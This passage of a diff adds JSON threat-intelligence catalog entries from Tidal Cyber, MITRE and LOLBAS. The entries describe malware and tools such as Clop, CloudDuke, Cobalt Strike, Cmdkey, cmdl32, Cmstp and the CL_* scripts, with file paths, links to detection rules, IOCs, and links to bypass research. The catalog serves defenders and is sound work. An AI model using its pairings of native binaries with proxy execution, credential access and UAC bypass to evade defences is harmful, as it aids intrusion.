2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0667", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "579607c2-d046-40df-99ab-beb479c37a2a", + "type": "similar" + } + ], + "uuid": "df77ed2a-f135-4f00-9a5e-79b7a6a2ed14", + "value": "Chrommme" + }, + { + "description": "[Clambling](https://app.tidalcyber.com/software/4bac93bd-7e58-4ddb-a205-d99597b9e65e) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2017.[[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0660", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "6e95feb1-78ee-48d3-b421-4d76663b5c49", + "type": "similar" + } + ], + "uuid": "4bac93bd-7e58-4ddb-a205-d99597b9e65e", + "value": "Clambling" + }, + { + "description": "[[CL_Invocation.ps1 - LOLBAS Project](/references/a53e093a-973c-491d-91e3-bc7804d87b8b)]", + "meta": { + "id": "22caac14-075b-404d-a35c-d987cc9a62a1", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4bc36e22-6529-4a4a-a5d2-461f3925c5f3", + "type": "similar" + } + ], + "uuid": "351a3856-6bc0-4712-923b-8e921785b95b", + "value": "CL_Invocation.ps1" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Aero diagnostics script\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1\n* C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1\n* C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1\n\n**Resources:**\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_cl_invocation.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml)\n* Sigma: [posh_ps_cl_invocation_lolscript.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml)[[CL_Invocation.ps1 - LOLBAS Project](/references/a53e093a-973c-491d-91e3-bc7804d87b8b)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5257", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "351a3856-6bc0-4712-923b-8e921785b95b", + "type": "similar" + } + ], + "uuid": "4bc36e22-6529-4a4a-a5d2-461f3925c5f3", + "value": "CL_Invocation" + }, + { + "description": "[[CL_LoadAssembly.ps1 - LOLBAS Project](/references/31a14027-1181-49b9-87bf-78a65a551312)]", + "meta": { + "id": "a30c2c43-f823-466f-bfd4-45b2a58b2bec", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "cb950179-334d-4bd9-9cfb-87b09d279a3b", + "type": "similar" + } + ], + "uuid": "9c4d1519-33eb-4280-aa2e-aca22b8e822c", + "value": "CL_LoadAssembly.ps1" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** PowerShell Diagnostic Script\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1\n\n**Resources:**\n* [https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/](https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbas_cl_loadassembly.yml](https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml)[[CL_LoadAssembly.ps1 - LOLBAS Project](/references/31a14027-1181-49b9-87bf-78a65a551312)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5255", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "9c4d1519-33eb-4280-aa2e-aca22b8e822c", + "type": "similar" + } + ], + "uuid": "cb950179-334d-4bd9-9cfb-87b09d279a3b", + "value": "CL_LoadAssembly" + }, + { + "description": "[[CL_Mutexverifiers.ps1 - LOLBAS Project](/references/75b89502-21ed-4920-95cc-212eaf17f281)]", + "meta": { + "id": "5c75fd56-0471-4dc0-9fb2-3dda8269e59d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3c63792a-1184-416e-aa9b-18da72e88327", + "type": "similar" + } + ], + "uuid": "06c669e0-0111-45c3-868d-0b5fad1d1b42", + "value": "CL_Mutexverifiers.ps1" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Proxy execution with CL_Mutexverifiers.ps1\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1\n* C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1\n* C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1\n* C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1\n* C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/995111125447577600](https://twitter.com/pabraeken/status/995111125447577600)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_cl_mutexverifiers.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml)[[CL_Mutexverifiers.ps1 - LOLBAS Project](/references/75b89502-21ed-4920-95cc-212eaf17f281)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5256", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "06c669e0-0111-45c3-868d-0b5fad1d1b42", + "type": "similar" + } + ], + "uuid": "3c63792a-1184-416e-aa9b-18da72e88327", + "value": "CL_Mutexverifiers" + }, + { + "description": "[Clop](https://app.tidalcyber.com/software/5321aa75-924c-47ae-b97a-b36f023abf2a) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://app.tidalcyber.com/software/5321aa75-924c-47ae-b97a-b36f023abf2a) is a variant of the CryptoMix ransomware.[[Mcafee Clop Aug 2019](https://app.tidalcyber.com/references/458141bd-7dd2-41fd-82e8-7ea2e4a477ab)][[Cybereason Clop Dec 2020](https://app.tidalcyber.com/references/f54d682d-100e-41bb-96be-6a79ea422066)][[Unit42 Clop April 2021](https://app.tidalcyber.com/references/ce48d631-757c-480b-8572-b7d9f4d738c6)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0611", + "source": "MITRE", + "tags": [ + "b15c16f7-b8c7-4962-9acc-a98a39f87b69", + "b18b5401-d88d-4f28-8f50-a884a5e58349", + "ac862a66-a4ec-4285-9a21-b63576a5867d", + "5ab5f811-5c7e-4f77-ae90-59d3beb93346", + "1b5da77a-bf84-4fba-a6d7-8b3b8f7699e0", + "e401022a-36ac-486d-8503-dd531410a927", + "8a77c410-bed9-4376-87bf-5ac84fbc2c9d", + "ab64f2d8-8da3-48de-ac66-0fd91d634b22", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "cad3ba95-8c89-4146-ab10-08daa813f9de", + "type": "similar" + } + ], + "uuid": "5321aa75-924c-47ae-b97a-b36f023abf2a", + "value": "Clop" + }, + { + "description": "", + "meta": { + "id": "59d0f44a-2aad-42c3-97cc-4c92e8527f00" + }, + "related": [ + { + "dest-uuid": "b3dd424b-ee96-449c-aa52-abbc7d4dfb86", + "type": "similar" + } + ], + "uuid": "4f8334fd-987a-4d3a-b7cf-e5e1800eee90", + "value": "MiniDionis" + }, + { + "description": "", + "meta": { + "id": "941f9757-9100-4791-9a6e-77843e6d1e5d" + }, + "related": [ + { + "dest-uuid": "b3dd424b-ee96-449c-aa52-abbc7d4dfb86", + "type": "similar" + } + ], + "uuid": "f714e1f8-1a16-46cc-981c-26729d500770", + "value": "CloudLook" + }, + { + "description": "[CloudDuke](https://app.tidalcyber.com/software/b3dd424b-ee96-449c-aa52-abbc7d4dfb86) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) in 2015. [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)] [[Securelist Minidionis July 2015](https://app.tidalcyber.com/references/af40a05e-02fb-4943-b3ff-9a292679e93d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0054", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "cbf646f1-7db5-4dc6-808b-0094313949df", + "type": "similar" + }, + { + "dest-uuid": "4f8334fd-987a-4d3a-b7cf-e5e1800eee90", + "type": "similar" + }, + { + "dest-uuid": "f714e1f8-1a16-46cc-981c-26729d500770", + "type": "similar" + } + ], + "uuid": "b3dd424b-ee96-449c-aa52-abbc7d4dfb86", + "value": "CloudDuke" + }, + { + "description": "", + "meta": { + "id": "94b63e82-16a8-4bc0-a239-2c28cabfa131" + }, + "related": [ + { + "dest-uuid": "98d89476-63ec-4baf-b2b3-86c52170f5d8", + "type": "similar" + } + ], + "uuid": "2757101d-84c7-4acc-be12-2f2a7b79bc2e", + "value": "cmd.exe" + }, + { + "description": "[cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. [[TechNet Cmd](https://app.tidalcyber.com/references/dbfc01fe-c300-4c27-ab9a-a20508c1e04b)]\n\nCmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir [[TechNet Dir](https://app.tidalcyber.com/references/f1eb8631-6bea-4688-a5ff-a388b1fdceb0)]), deleting files (e.g., del [[TechNet Del](https://app.tidalcyber.com/references/01fc44b9-0eb3-4fd2-b755-d611825374ae)]), and copying files (e.g., copy [[TechNet Copy](https://app.tidalcyber.com/references/4e0d4b94-6b4c-4104-86e6-499b6aa7ba78)]).", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0106", + "source": "MITRE", + "tags": [ + "a968c9f3-c190-488f-bacc-92e8f1ce295c", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "5f8c6ee0-f302-403b-b712-f1e3df064c0c", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "863b7013-133d-4a82-93d2-51b53a8fd30e", + "type": "used-by" + }, + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "a0c31021-b281-4c41-9855-436768299fe7", + "type": "used-by" + }, + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "used-by" + }, + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "efb3b5ac-cd86-44a2-9de1-02e4612b8cc2", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "used-by" + }, + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "used-by" + }, + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "f1477581-d485-403f-a95f-c56bf88c5d1e", + "type": "used-by" + }, + { + "dest-uuid": "b8a349a6-cde1-4d95-b20f-44c62bbfc786", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "used-by" + }, + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "used-by" + }, + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "021b3c71-6467-4e46-a413-8b726f066f2c", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "bba595da-b73a-4354-aa6c-224d4de7cb4e", + "type": "similar" + }, + { + "dest-uuid": "2757101d-84c7-4acc-be12-2f2a7b79bc2e", + "type": "similar" + } + ], + "uuid": "98d89476-63ec-4baf-b2b3-86c52170f5d8", + "value": "cmd" + }, + { + "description": "[[Cmdkey.exe - LOLBAS Project](/references/c9ca075a-8327-463d-96ec-adddf6f1a7bb)]", + "meta": { + "id": "f20ab947-efa4-42ce-84ee-5b7fc4bc3984", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "da252f67-2d4e-419f-b493-d4a1d024a01c", + "type": "similar" + } + ], + "uuid": "adcf033c-3514-40b4-81fc-d0534cd0d050", + "value": "Cmdkey.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** creates, lists, and deletes stored user names and passwords or credentials.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\cmdkey.exe\n* C:\\Windows\\SysWOW64\\cmdkey.exe\n\n**Resources:**\n* [https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation](https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation)\n* [https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey)\n\n**Detection:**\n* Sigma: [proc_creation_win_cmdkey_recon.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml)[[Cmdkey.exe - LOLBAS Project](/references/c9ca075a-8327-463d-96ec-adddf6f1a7bb)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5089", + "source": "Tidal Cyber", + "tags": [ + "96bff827-e51f-47de-bde6-d2eec0f99767", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "adcf033c-3514-40b4-81fc-d0534cd0d050", + "type": "similar" + } + ], + "uuid": "da252f67-2d4e-419f-b493-d4a1d024a01c", + "value": "Cmdkey" + }, + { + "description": "[[cmdl32.exe - LOLBAS Project](/references/2628e452-caa1-4058-a405-7c4657fa3245)]", + "meta": { + "id": "979b6530-dd16-4d7f-aaca-166b5996304b", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "44a523a8-9ed6-4f01-9a53-0e8ea1e15b51", + "type": "similar" + } + ], + "uuid": "ceb926c4-0b32-4073-bfd8-b7fc05cd1d62", + "value": "cmdl32.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Connection Manager Auto-Download\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\cmdl32.exe\n* C:\\Windows\\SysWOW64\\cmdl32.exe\n\n**Resources:**\n* [https://github.com/LOLBAS-Project/LOLBAS/pull/151](https://github.com/LOLBAS-Project/LOLBAS/pull/151)\n* [https://twitter.com/ElliotKillick/status/1455897435063074824](https://twitter.com/ElliotKillick/status/1455897435063074824)\n* [https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/](https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_cmdl32.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml)\n* IOC: Reports of downloading from suspicious URLs in %TMP%\\config.log\n* IOC: Useragent Microsoft(R) Connection Manager Vpn File Update[[cmdl32.exe - LOLBAS Project](/references/2628e452-caa1-4058-a405-7c4657fa3245)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5090", + "source": "Tidal Cyber", + "tags": [ + "4c8f8830-0b2c-4c79-b1db-8659ede492f0", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "ceb926c4-0b32-4073-bfd8-b7fc05cd1d62", + "type": "similar" + } + ], + "uuid": "44a523a8-9ed6-4f01-9a53-0e8ea1e15b51", + "value": "cmdl32" + }, + { + "description": "[[Cmstp.exe - LOLBAS Project](/references/86c21dcd-464a-4870-8aae-25fcaccc889d)]", + "meta": { + "id": "7cc16603-ebbc-4cad-910b-5b94b16438a9", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "6f848e15-5234-4445-9a05-2949e4c57f0b", + "type": "similar" + } + ], + "uuid": "7daa8928-e3ff-4e2c-9a33-df39bec265e1", + "value": "Cmstp.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Installs or removes a Connection Manager service profile.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\cmstp.exe\n* C:\\Windows\\SysWOW64\\cmstp.exe\n\n**Resources:**\n* [https://twitter.com/NickTyrer/status/958450014111633408](https://twitter.com/NickTyrer/status/958450014111633408)\n* [https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80](https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80)\n* [https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e](https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e)\n* [https://oddvar.moe/2017/08/15/research-on-cmstp-exe/](https://oddvar.moe/2017/08/15/research-on-cmstp-exe/)\n* [https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1](https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1)\n* [https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp)\n\n**Detection:**\n* Sigma: [proc_creation_win_cmstp_execution_by_creation.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml)\n* Sigma: [proc_creation_win_uac_bypass_cmstp.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml)\n* Splunk: [cmlua_or_cmstplua_uac_bypass.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* IOC: Execution of cmstp.exe without a VPN use case is suspicious\n* IOC: DotNet CLR libraries loaded into cmstp.exe\n* IOC: DotNet CLR Usage Log - cmstp.exe.log[[Cmstp.exe - LOLBAS Project](/references/86c21dcd-464a-4870-8aae-25fcaccc889d)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5091", + "source": "Tidal Cyber", + "tags": [ + "65938118-2f00-48a1-856e-d1a75a08e3c6", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "7daa8928-e3ff-4e2c-9a33-df39bec265e1", + "type": "similar" + } + ], + "uuid": "6f848e15-5234-4445-9a05-2949e4c57f0b", + "value": "Cmstp" + }, + { + "description": "[Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]\n\nIn addition to its own capabilities, [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16).[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0154", + "source": "MITRE", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444", + "56d89c06-23a0-4642-adfc-1fffd3524191", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "992bdd33-4a47-495d-883a-58010a2f0efb", + "e81ba503-60b0-4b64-8f20-ef93e7783796" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b8a349a6-cde1-4d95-b20f-44c62bbfc786", + "type": "used-by" + }, + { + "dest-uuid": "f2b31240-0b4a-4fa4-82a4-6bb00e146e75", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "used-by" + }, + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "type": "used-by" + }, + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "used-by" + }, + { + "dest-uuid": "393da13e-016c-41a3-9d89-b33173adecbf", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "2e2d3e75-1160-4ba5-80cc-8e7685fcfc44", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + }, + { + "dest-uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + }, + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "713e2963-fbf4-406f-a8cf-6a4489d90439", + 